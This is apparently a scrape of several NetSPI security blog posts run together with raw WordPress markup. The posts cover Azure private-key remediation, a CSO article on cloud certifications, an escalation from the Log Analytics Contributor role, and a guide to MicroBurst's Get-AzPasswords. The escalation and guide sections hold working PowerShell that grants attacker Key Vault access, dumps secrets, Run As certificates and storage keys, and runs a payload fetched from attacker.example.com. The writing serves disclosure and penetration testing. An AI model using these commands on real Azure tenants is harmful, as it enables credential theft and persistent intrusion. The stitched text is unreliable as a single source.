One important remediation step to note here is the removal of the previous certificate. If the previous credential has not yet expired, it will still be viable for authentication. To fully remediate the issue, the new certificate must be generated, and the old certificate needs to be removed from the App Registration.
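A minimal sketch of that cleanup with the Az PowerShell module, assuming rights to manage the App Registration; $appId and $oldKeyId are placeholders for your own values.

# List the credentials, note the old certificate's KeyId, then remove it
Get-AzADAppCredential -ApplicationId $appId
Remove-AzADAppCredential -ApplicationId $appId -KeyId $oldKeyId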
Now that our example has been remediated, we can see that the new manifest value decodes to the public key for the certificate.
I worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. You can read Microsoft’s disclosure materials online here.
A representative from MSRC shared the following details with NetSPI regarding the remediation steps taken by Microsoft:
- Impacted Azure services have deployed updates that prevent clear text private key data from being stored during application creation.
- Additionally, Azure Active Directory deployed an update that prevents access to private key data previously stored.
- Customers will be notified via Azure Service Health and should perform the mitigation steps specified in the notification to remediate any confirmed impacted Application and/or Service Principal.
Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account "Run as" certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.
Summary
This was one of the fastest issues that I’ve seen go through the MSRC pipeline. I really appreciate the quick turnaround and open lines of communication that we had with the MSRC team. They were really great to work with on this issue.
Below is the timeline for the vulnerability:
- 10/07/2021 – Initial report submitted to MSRC
- 10/08/2021 – MSRC assigns a case number to the submission
- October of 2021 – Back and forth emails and clarification with MSRC
- 10/29/2021 – NetSPI confirms initial MSRC remediation
- 11/17/2021 – Public Disclosure
While this was initially researched in a test environment, this issue was quickly escalated once we identified it in client environments. We want to extend special thanks to the clients that worked with us in identifying the issue in their environment and their willingness to let us do a spot check for an unknown vulnerability.
Looking for an Azure cloud pentesting partner? Connect with NetSPI: https://www.netspi.com/contact-us/
Addendum
NetSPI initially discovered this issue with Automation Account "Run as" certificates. MSRC's blog post details that two additional services were affected: Azure Migrate and Azure Site Recovery. These two services also create App Registrations in Azure Active Directory and were affected by the same issue which caused private keys to be stored in App Manifests. It is also possible that manually created Azure AD applications and Service Principals had private keys stored in the same manner.
We recommend taking the same remediation steps for any service principals associated with these services. Microsoft has published tooling to help identify and remediate the issue in each of these scenarios. Their guides and scripts are available here: https://github.com/microsoft/aad-app-credential-tools
NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications:
As companies move more and more of their infrastructure to the cloud, they're forced to shift their approach to security. The security controls you need to put in place for a cloud-based infrastructure are different from those for a traditional datacenter. There are also threats specific to a cloud environment. A mistake could put your data at risk.
It's no surprise that hiring managers are looking for candidates who can demonstrate their cloud security know-how—and a number of companies and organizations have come up with certifications to help candidates set themselves apart. As in many other areas of IT, these certs can help give your career a boost.
But which certification should you pursue? We spoke to a number of IT security pros to get their take on those that are the most widely accepted signals of high-quality candidates. These include cloud security certifications for both relative beginners and advanced practitioners.
Going beyond certifications
All of these certs are good ways to demonstrate your skills to your current or potential future employers — they're "a good way to get your foot in the door at a company doing cloud security and they're good for getting past a resume filter," says Karl Fosaaen, Cloud Practice Director at NetSPI. That said, they certainly aren't a be-all, end-all, and a resume with nothing but certifications on it will not impress anybody.
"Candidates need to be able to show an understanding of how the cloud components work and integrate with each other for a given platform," Fosaaen continues. "Many of the currently available certifications only require people to memorize terminology, so you don't have a guaranteed solid candidate if they simply have a certification. For those hiring on these certifications, make sure that you're going the extra level to make sure the candidates really do understand the cloud providers that your organization uses."
Fosaaen recommends pursuing specific trainings to further burnish your resume, such as the SANS Institute's Cloud Penetration Testing course, BHIS's Breaching The Cloud Perimeter, or his own company's Dark Side Ops Training. Concrete training courses like these can be a great complement to the "book learning" of a certification.
To learn more, read the full article here: https://www.csoonline.com/article/3631530/8-top-cloud-security-certifications.html
[post_title] => CSO: 8 top cloud security certifications [post_excerpt] => NetSPI Director Karl Fosaaen was featured in a CSO online article called 8 top cloud security certifications. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cso-8-top-cloud-security-certifications [to_ping] => [pinged] => [post_modified] => 2024-04-02 08:50:37 [post_modified_gmt] => 2024-04-02 13:50:37 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26468 [menu_order] => 366 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 11855 [post_author] => 10 [post_date] => 2021-09-13 10:00:00 [post_date_gmt] => 2021-09-13 15:00:00 [post_content] =>TL;DR - This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.
The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.
Based on the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.
Escalating Azure Permissions
Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.
These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.
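For example, a runbook running in the “Run As” context could grant the attacker vault access with a single call. A minimal sketch with illustrative names:

# Runs under the Contributor context of the Run As account; vault name and UPN are illustrative
Set-AzKeyVaultAccessPolicy -VaultName "targetVault" -UserPrincipalName "attacker@example.com" -PermissionsToKeys get,list -PermissionsToSecrets get,list
Get-AzKeyVaultSecret -VaultName "targetVault"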
Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).
Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.
Attack Walkthrough
Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We need to be an Owner on the subscription to create this account, as contributors do not have rights to add the Run As account.
Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.
In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.
On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.
PS C:\temp> Connect-AzAccount

Account                 SubscriptionName TenantId     Environment
-------                 ---------------- --------     -----------
LogAnalyticsContributor kfosaaen         6[REDACTED]2 AzureCloud
Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.
PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions
Using the Get-AzPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate.
PS C:\temp> Get-AzPasswords -Verbose
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed
We then used the MicroBurst-created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID - d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.
PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1

   PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My

Thumbprint                               Subject
----------                               -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5

Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud], [AzureUSGovernment, AzureUSGovernment]}
Context      : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Tenant

Account                              Subscription
-------                              ------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5

PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b

RoleAssignmentId   : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope              : /subscriptions/7a[REDACTED]b5
DisplayName        : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName         :
RoleDefinitionName : Contributor
RoleDefinitionId   : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId           : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType         : ServicePrincipal
CanDelegate        : False
Description        :
ConditionVersion   :
Condition          :
MSRC Submission Timeline
Microsoft was great to work with on the submission, and they were quick to respond to the issue. They have since removed the Automation Account permissions from the affected role and updated the documentation to reflect the change.
Here’s a general timeline of the MSRC reporting process:
- NetSPI initially reports the issue to Microsoft – 10/15/20
- MSRC Case 61630 created – 10/19/20
- Follow up email sent to MSRC – 12/10/20
- MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
- Multiple back-and-forth emails to determine disclosure timelines – March-July 2021
- Microsoft updates the role documentation to address the issue – July 2021
- NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
- Microsoft removes Automation Account permissions from the LAC Role – August 2021
Postscript
While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions:
"actions": [ "*/read", "Microsoft.ClassicCompute/virtualMachines/extensions/*", "Microsoft.ClassicStorage/storageAccounts/listKeys/action", "Microsoft.Compute/virtualMachines/extensions/*", "Microsoft.HybridCompute/machines/extensions/write", "Microsoft.Insights/alertRules/*", "Microsoft.Insights/diagnosticSettings/*", "Microsoft.OperationalInsights/*", "Microsoft.OperationsManagement/*", "Microsoft.Resources/deployments/*", "Microsoft.Resources/subscriptions/resourcegroups/deployments/*", "Microsoft.Storage/storageAccounts/listKeys/action", "Microsoft.Support/*" ]
More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.
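As a rough sketch of those two pivots with standard Az cmdlets (the resource group, VM, script URL, and storage account names below are placeholders, not values from this engagement):

# Run a script on a VM through the Custom Script Extension
# (allowed by Microsoft.Compute/virtualMachines/extensions/*)
Set-AzVMCustomScriptExtension -ResourceGroupName "TargetRG" -VMName "TargetVM" `
    -Location "eastus" -Name "CustomScriptExtension" `
    -FileUri "https://attacker.example.com/payload.ps1" -Run "payload.ps1"

# Dump the Storage Account keys
# (allowed by Microsoft.Storage/storageAccounts/listKeys/action)
Get-AzStorageAccountKey -ResourceGroupName "TargetRG" -Name "targetstorage"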
Looking for an Azure pentesting partner? Consider NetSPI.
Escalating Azure Privileges with the Log Analytics Contributor Role

Azure Pentesting: Extracting All the Azure Passwords

Whether it's the migration of legacy systems or the creation of brand-new applications, many organizations are turning to Microsoft’s Azure cloud as their platform of choice. This brings new challenges for penetration testers who are less familiar with the platform, and now have more attack surfaces to exploit. In an attempt to automate some of the common Azure escalation tasks, the MicroBurst toolkit was created to contain tools for attacking different layers of an Azure tenant. In this talk, we will be focusing on the password extraction functionality included in MicroBurst. We will review many of the places that passwords can hide in Azure, and the ways to manually extract them. For convenience, we will also show how the Get-AzPasswords function can be used to automate the extraction of credentials from an Azure tenant. Finally, we will review a case study on how this tool was recently used to find a critical issue in the Azure permissions model that resulted in a fix from Microsoft.
Watch the talk: https://youtu.be/m1xxLZVtSz0
It has been a while since the initial release (August 2018) of the Get-AzurePasswords module within MicroBurst, so I figured it was time to do an overview post that explains how to use each option within the tool. Since each targeted service in the script has a different way of getting credentials, I want users of the tool to really understand how things are working.
For those that just want to jump to information on specific services, here are links to each section:
Additionally, we've renamed the function to Get-AzPasswords to match the PowerShell modules that we're using in the function.
AzureRM Versus Az
As of March 19, 2020, we pushed some changes to MicroBurst to switch the cmdlets over to the Az PowerShell modules (from AzureRM). This was a much-needed switch, as the AzureRM modules are being replaced by the Az modules.
New updates for MicroBurst! I’ve ported the previous scripts to the Az module cmdlets (from AzureRM/Azure) and moved them to their own folder. All of the previous scripts will still be there, just under different folders (organized by module dependency). https://t.co/h3EwMt9JWZ
— Karl (@kfosaaen) March 19, 2020
Along with these updates, I also wanted to make some additions to the Get-AzurePasswords functionality. Since we reorganized all of the code in MicroBurst to match up with the related supporting modules (Az, AzureAD, MSOL, etc.), we thought it was important to separate out function names based on the modules each script uses.
Get-AzurePasswords will still live in the AzureRM folder in MicroBurst, but it will not be updated with any new functionality. Going forward, I highly recommend that everyone switch over to the newly renamed version, Get-AzPasswords, in the Az folder in MicroBurst.
Important Script Usage Note - Some of these functions can make minor temporary changes to an Azure subscription (see Automation Accounts). If you Ctrl+C during the script execution, you may end up with unintended files or changes in your subscription.
I'll cover each of these concerns in the sections below, but have patience when running these functions. I know Azure can have its slow moments, so (in most cases) just give the script a moment to catch up and everything should be good. I haven't been keeping track, but I believe I've lost several months of time waiting for automation runbook jobs to complete.
Function Usage
For each service section, I've noted the script flag that you can use to toggle ("-Keys Y" versus "-Keys N") the collection of that specific service. Running the script with no flags will gather credentials from all services.
Step 1. Import the MicroBurst Module
PS C:\MicroBurst> Import-Module .\MicroBurst.psm1
Imported Az MicroBurst functions
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions
Step 2. Authenticate to the Azure Tenant
PS C:\MicroBurst> Login-AzAccount

Account          SubscriptionName TenantId                             Environment
-------          ---------------- --------                             -----------
test@example.com TestSubscription 4712345a-6543-b5s4-a2b2-e01234567895 AzureCloud
Step 3. Gather Passwords
PS C:\MicroBurst> Get-AzPasswords -Verbose
VERBOSE: Logged In as test@example.com
VERBOSE: Getting List of Key Vaults...
VERBOSE: Exporting items from testingKeys
VERBOSE: Getting Key value for the testKey Key
VERBOSE: Getting Secret value for the TestKey Secret
VERBOSE: Getting List of Azure App Services...
VERBOSE: Profile available for microburst-application
VERBOSE: Getting List of Azure Container Registries...
VERBOSE: Getting List of Storage Accounts...
VERBOSE: Getting the Storage Account keys for the teststorage account
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for autoadmin using the XZvOYzsuBiGbfqe.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-autoadmin-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing XZvOYzsuBiGbfqe runbook from autoadmin Automation Account
VERBOSE: Getting cleartext credentials for the autoadmin Automation Account
VERBOSE: Getting cleartext credentials for test using the dOFtWgEXIQLlRfv.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Removing dOFtWgEXIQLlRfv runbook from autoadmin Automation Account
VERBOSE: Password Dumping Activities Have Completed
*Running this will prompt you, via Out-GridView, to select the subscription(s) to gather credentials from.
For easier output management, I'd recommend piping the output to either "Out-GridView" or "Export-CSV".
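For example, a run that only gathers Key Vault and Storage Account credentials and writes everything to a CSV might look like the following (the flag names match the sections below; the output file name is arbitrary):

Get-AzPasswords -Keys Y -StorageAccounts Y -AppServices N -AutomationAccounts N -Verbose |
    Export-Csv -Path .\az-passwords.csv -NoTypeInformation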
With that housekeeping out of the way, let's dive into the credentials that we're able to gather with Get-AzPasswords.
Key Vaults (-Keys Y)
Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores.
Vault access is controlled by the Access Policies in each vault, but any users with Contributor rights are able to give themselves access to a Key Vault. Get-AzPasswords will not modify any Key Vault Access Policies, but you could give your account read permissions on the vault if you really needed to read a key.
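If you do go down that road, a minimal sketch with the Az.KeyVault cmdlets might look like this (the vault, user, and secret names are placeholders, and this assumes the vault uses Access Policies rather than Azure RBAC):

# Grant the current user read access to secrets in the vault
# Note: this modifies the vault's Access Policies; Get-AzPasswords itself won't do this
Set-AzKeyVaultAccessPolicy -VaultName "targetVault" `
    -UserPrincipalName "you@example.com" -PermissionsToSecrets get,list

# Read a secret value; -AsPlainText requires a newer Az.KeyVault module version
Get-AzKeyVaultSecret -VaultName "targetVault" -Name "TestKey" -AsPlainText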
An example Key Vault Secret:
Get-AzPasswords will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificate files locally with the "-ExportCerts Y" flag.
Sample Output:
Type         : Key
Name         : DiskKey
Username     : N/A
Value        : {"kid":"https://notArealVault.vault.azure.net/keys/DiskKey/63abcdefghijklmnop39","kty":"RSA","key_ops":["sign","verify","wrapKey","unwrapKey","encrypt","decrypt"],"n":"v[REDACTED]w","e":"AQAB"}
PublishURL   : N/A
Created      : 5/19/2020 5:20:12 PM
Updated      : 5/19/2020 5:20:12 PM
Enabled      : True
Content Type : N/A
Vault        : notArealVault
Subscription : NotARealSubscription

Type         : Secret
Name         : TestKey
Username     : N/A
Value        : Karl'sPassword
PublishURL   : N/A
Created      : 3/7/2019 9:28:37 PM
Updated      : 3/7/2019 9:28:37 PM
Enabled      : True
Content Type : Password
Vault        : notArealVault
Subscription : NotARealSubscription
Finally, access to the Key Vaults may be restricted by network, so you may need to run this from an Azure VM on the subscription, or from an IP in the approved "Private endpoint and selected networks" list. These settings can be found under the Networking tab in the Azure portal.
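To get a quick read on whether a vault is network-restricted before you start pulling secrets, something like this should work (the vault name is a placeholder; the NetworkAcls property name is per the Az.KeyVault module):

# A DefaultAction of "Deny" means you'll need to come from an allowed
# network, a private endpoint, or a resource inside the subscription
(Get-AzKeyVault -VaultName "targetVault").NetworkAcls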
Alternatively, you may need to use an automation account "Run As" account to request the keys. Steps to complete that process are outlined here.
App Services (-AppServices Y)
Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using app services and the configurations (passwords) are pushed to the applications via the App Services profiles.
In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile.
These publish profiles contain Web and FTP credentials that can be used to get access to the App Service's files. In addition, any stored connection strings should also be available in the file. All available profile credentials are parsed by Get-AzPasswords, so it's easy to gather credentials for multiple App Services applications at once.
Sample Output:
Type         : AppServiceConfig
Name         : appServicesApplication - Web Deploy
Username     : $appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : appServicesApplication.scm.azurewebsites.net:443
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type         : AppServiceConfig
Name         : appServicesApplication - FTP
Username     : appServicesApplication\$appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : ftp://appServicesApplication.ftp.azurewebsites.windows.net/site/wwwroot
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type         : AppServiceConfig
Name         : appServicesApplication-Custom-ConnectionString
Username     : N/A
Value        : metadata=res://*/Models.appServicesApplication.csdl|res://*/Models.appServicesApplication.ssdl|res://*/Models.appServicesApplication.msl;provider=System.Data.SqlClient;provider connection string="Data Source=abcde.database.windows.net;Initial Catalog=app_Enterprise_Prod;Persist Security Info=True;User ID=psqladmin;Password=somepassword9"
PublishURL   : N/A
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : ConnectionString
Vault        : N/A
Subscription : NotARealSubscription
Potential next steps for App Services have been outlined in another NetSPI blog post here.
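If you only need one application's credentials, you can also pull the profile manually. A minimal sketch, with placeholder resource group and application names:

# Download the publish profile XML and parse out the deployment credentials
Get-AzWebAppPublishingProfile -ResourceGroupName "TargetRG" -Name "targetapp" `
    -OutputFile .\targetapp.publishsettings | Out-Null
[xml]$profile = Get-Content .\targetapp.publishsettings
$profile.publishData.publishProfile |
    Select-Object profileName, publishUrl, userName, userPWD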
Automation Accounts (-AutomationAccounts Y)
Automation Accounts are one of the ways that you can automate jobs and routine tasks within Azure. These tasks (Runbooks) are frequently run with stored credentials, or with the service account (Run As "Connections") tied to the Automation Account.
Both of these credential types can be returned with Get-AzPasswords and can potentially allow for privilege escalation. In order to gather these credentials from the Automation Accounts, we need to create new runbooks that will cast the credentials out to variables that are then printed to the runbook job output.
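Conceptually, the core of one of those temporary runbooks is only a few lines. Here's a minimal sketch of the idea (the stored credential name is a placeholder; the actual MicroBurst runbooks also encrypt the output, as described next):

# This runs inside the Automation Account, where stored credentials can be decrypted
$cred = Get-AutomationPSCredential -Name "StoredCredentialName"
$cred.UserName
$cred.GetNetworkCredential().Password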
To protect these credentials in the output, we've implemented an encryption scheme in Get-AzPasswords that encrypts the job output.
The Run As certificates (covered in another blog) can then be used to authenticate (run the AuthenticateAs PS1 script) from your testing system as the stored Run As connection.
Any stored credentials may have a variety of uses, but I've frequently seen domain accounts being stored here, so that can lead to some interesting lateral movement options.
Sample Output:
Type         : Azure Automation Account
Name         : kfosaaen
Username     : test
Value        : testPassword
PublishURL   : N/A
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription
As a secondary note here, you can also request bearer tokens for the Run As automation accounts from a custom runbook. I cover the process in this blog post, but I think it's worth noting here, since it's not included in Get-AzPasswords, but it is an additional way to get a credential from an Automation Account.
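The short version of that token trick, as a hedged sketch of a runbook body (Get-AzAccessToken requires a relatively recent Az.Accounts module):

# Authenticate inside the runbook as the Run As service principal
$conn = Get-AutomationConnection -Name "AzureRunAsConnection"
Connect-AzAccount -ServicePrincipal -Tenant $conn.TenantId `
    -ApplicationId $conn.ApplicationId -CertificateThumbprint $conn.CertificateThumbprint

# Write a management-plane bearer token to the job output
(Get-AzAccessToken).Token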
And one final note on gathering credentials from Automation Accounts: as noted above, Azure Automation Accounts can sometimes be slow to respond. If you're having issues getting a runbook to run and you cancel the function execution before it completes, you will need to manually clean up the runbooks that were created as part of the function execution.
These will always be named with a 15-character random string of letters (e.g., lwVSNvWYpPXCcDd). You will also have local files in your execution directory to clean up; they will have the same names as the runbooks that were uploaded for execution.
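One way to spot leftovers is to search for runbook names matching that pattern. A cleanup sketch, with placeholder resource group and Automation Account names (review the matches before deleting anything):

# Find and remove runbooks whose names are exactly 15 random letters
Get-AzAutomationRunbook -ResourceGroupName "TargetRG" -AutomationAccountName "autoadmin" |
    Where-Object { $_.Name -cmatch '^[A-Za-z]{15}$' } |
    Remove-AzAutomationRunbook -Force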
Storage Account Keys (-StorageAccounts Y)
Storage Accounts are the multipurpose (public/private files, tables, queues) service for storing data in an Azure subscription. This section is pretty simple compared to the previous ones, but gathering the account keys is an easy way to maintain persistence in a sensitive data store. These keys can be used with the Azure Storage Explorer application to remotely mount storage accounts.
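Once you have a key, you can also mount the account straight from PowerShell. A minimal sketch with placeholder names:

# Grab the first account key and build a storage context from it
$key = (Get-AzStorageAccountKey -ResourceGroupName "TargetRG" -Name "teststorage")[0].Value
$ctx = New-AzStorageContext -StorageAccountName "teststorage" -StorageAccountKey $key

# Enumerate blob containers with the account key
Get-AzStorageContainer -Context $ctx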
These access keys can easily be cycled, but if you're looking for persistence in a Storage Account, they would be your best bet. Additionally, if you're modifying Cloud Shell files for escalation/persistence, I'd recommend holding on to a copy of these keys for any Cloud Shell storage accounts.